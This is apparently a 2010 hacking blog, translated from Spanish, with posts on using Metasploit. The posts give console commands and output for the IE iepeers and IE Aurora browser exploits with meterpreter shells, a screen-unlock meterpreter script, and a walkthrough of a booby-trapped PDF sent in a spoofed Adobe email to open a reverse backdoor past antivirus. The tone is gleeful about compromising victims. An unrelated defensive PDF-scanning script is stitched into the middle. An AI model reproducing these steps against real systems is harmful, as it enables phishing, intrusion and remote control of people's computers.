
Sunday, March 14, 2010

[Metasploit] ie_iepeers_pointer

> use exploit/windows/browser/ie_iepeers_pointer
> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT (80)
> set LHOST
> set URIpath test.html
> exploit

Internet Explorer iepeers.dll use-after-free - Demo from Chris John Riley on Vimeo.

Thursday, February 25, 2010

[Metasploit] Screen unlocked with a meterpreter script

I like MSF more every day haha :P. This time I bring you a video of how to get into a system with MSF and unlock the screen :P. Here is the description from where I found the video, plus the video :P

Good luck!



"In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author's blog has more details.
Thanks go out to PaulDotCom for uploading this to vimeo"

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

[Metasploit] Automated Intrusion with Nmap and MSF

Well... haha this confirms my "theory" that the port 445 bug is already somewhat old,
but that doesn't stop it from being a bug with good exploitation.

This video is basically about finding a victim with an exploitable port 445 and using
Metasploit to automate an analysis and see which is the best exploit to use :), really good :).

Good luck!

VIDEO LINK

PS: Video author: Progresive Death

Sunday, February 21, 2010

[Metasploit] Adobe Exploit :)

In English :), those who know, know, and those who don't use Google Translate XD

Here in Spanish

Source: http://www.question-defense.com/



Using an Adobe Exploit in a Email Attack

This attack takes advantage of a vulnerability in Adobe Reader and Acrobat. The official release is here. Adobe has been informed of this vulnerability for well over a month now and has issued a statement that it will release a fix on January 14th. It is a scary thought that this exploit will be live and in the wild for almost 2 months before Adobe decides to fix it. I am making this post in order to make people aware of how such an attack can take place and how easy it is to implement.

I will be using the Metasploit framework and Backtrack Linux in order to launch this attack.

So starting out as the attacker the first thing we need to do is craft a .pdf which contains the malicious code that will trigger the vulnerability in Adobe.

As you can see I created a .pdf with a perfectly legit-looking name. I also added the Meterpreter “Backdoor” to the file with instructions to connect back to my attacking machine on port 8080 when it is opened. Most firewalls are not configured to inspect outgoing requests so this is a fairly effective way to bypass any firewall.

The next thing to do is craft an email which we will send to our victim. I mainly chose this method of attack in order to demonstrate how easy it is to send a spoofed email.

So what I have done here is created an official-looking email which looks like it came from techsupport@adobe.com. I didn't spend a ton of time on this but you can believe a real attacker will make this thing look “very” official. This email could be sent to literally thousands of people an hour. This is one of the reasons to keep your databases of emails secure because attackers will use them in this way.

Okay so the last thing we need to do is start our “Listener”. This is the process that will be waiting for the victim computer's connection once the malicious .pdf is opened.

You will notice that I started the handler with the same payload, port and IP address which I used when I crafted the .pdf file. This is a crucial step or the attack will not work.

Ok so now that we are all set, let's take a look at our victim….

There is our email in the victim's Gmail box. Looks perfectly normal, doesn't it?

Next our victim goes to download the .pdf so he can open it at his convenience later.

Notice how I highlighted in bright red that this computer is running an up-to-date version of the antivirus Avast. The Meterpreter backdoor is not detected by antivirus. Our victim could scan this .pdf with 10 different anti-virus programs and it would come up clean each time.

Next our poor guy will open the .pdf only to find, to his dismay, that it's blank and starts creating some stability issues for Adobe.

Now we could have added some official looking text into this .pdf with real security instructions and stuff but I did not. Once again you can believe an attacker will go through the trouble of making it look very official.

So meanwhile back at the ranch where we have been patiently waiting…….

As soon as our poor victim opened the .pdf file, our backdoor reached out and connected to the attacker machine.

That's it!

So what did we learn?
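One defensive takeaway from the attack above is that the malicious attachment, not the mail, is the thing to inspect. As an added example (not part of the original post or of question-defense.com), the Python triage script below flags PDF attachments that carry auto-executing actions, including ones hidden inside Flate-compressed streams. The keyword weights are this example's own heuristic, and the three PDFs are constructed samples.

```python
import re
import zlib

# Keyword weights are this example's own heuristic (assumption), not a standard.
SUSPICIOUS_KEYS = {
    b"/OpenAction": 2,    # action fired as soon as the document is opened
    b"/AA": 2,            # additional automatic actions (page open, mouse, ...)
    b"/JavaScript": 3,    # JavaScript action dictionary
    b"/JS": 3,            # the script itself (string or stream)
    b"/Launch": 3,        # launches an external application
    b"/EmbeddedFile": 1,  # file carried inside the PDF
}

def _inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every FlateDecode stream, so keywords that
    were hidden inside compressed objects are visible to the scan too."""
    out = data
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            out += zlib.decompress(m.group(1))
        except zlib.error:
            pass  # not a Flate stream (image data, etc.)
    return out

def scan_pdf(data: bytes) -> dict:
    """Count suspicious keywords in a PDF byte string and score the result."""
    if not data.startswith(b"%PDF"):
        raise ValueError("not a PDF header")
    body = _inflate_streams(data)
    # Negative lookahead keeps /JS from matching inside longer names.
    hits = {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", body))
            for k in SUSPICIOUS_KEYS}
    score = sum(SUSPICIOUS_KEYS[k.encode()] * n for k, n in hits.items())
    return {"hits": {k: n for k, n in hits.items() if n},
            "score": score, "suspicious": score >= 3}

# Constructed sample: the catalog's /OpenAction points at a JavaScript action.
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"3 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
# Constructed sample: the same action object hidden in a Flate-compressed stream.
COMPRESSED_PDF = (b"%PDF-1.4\n4 0 obj << /Filter /FlateDecode >>\nstream\n"
                  + zlib.compress(b"<< /S /JavaScript /JS (app.alert(1)) >>")
                  + b"\nendstream\nendobj\n%%EOF\n")
# Constructed sample: a catalog with no actions at all.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
```

Run `scan_pdf()` over an attachment's bytes at the mail gateway or in an analysis VM; a non-zero score is a reason to detonate the file in a sandbox rather than trust a clean antivirus verdict.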

Friday, February 19, 2010

[Metasploit] Exploit IE_Aurora 0-day

Well... poking around the internet I found this bug in IE that lets you get a remote shell :). Since I liked it I'll explain it my own way, but I'll also post the link where I found this information later.

Steps:

1.- Download the exploit HERE

2.- Save it in any folder (in this case Windows/Browser/)

3.- Run MSF and follow these commands:

=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 482 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated 58 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 58 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
msf exploit(ie_aurora) > set srvhost 192.168.0.101
srvhost => 192.168.0.101
msf exploit(ie_aurora) > set uripath /
uripath => /
msf exploit(ie_aurora) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Using URL: http://192.168.0.101:8080/
[*] Started bind handler




I think that for those who work with this there is no need to explain how MSF works, so I'll spare the comments :).

4.- Then the victim visits http://192.168.0.101:8080 and WOW! we're in :)

Well... that was all :), now here is the link where I got this information:

Site with the information: elhacker.net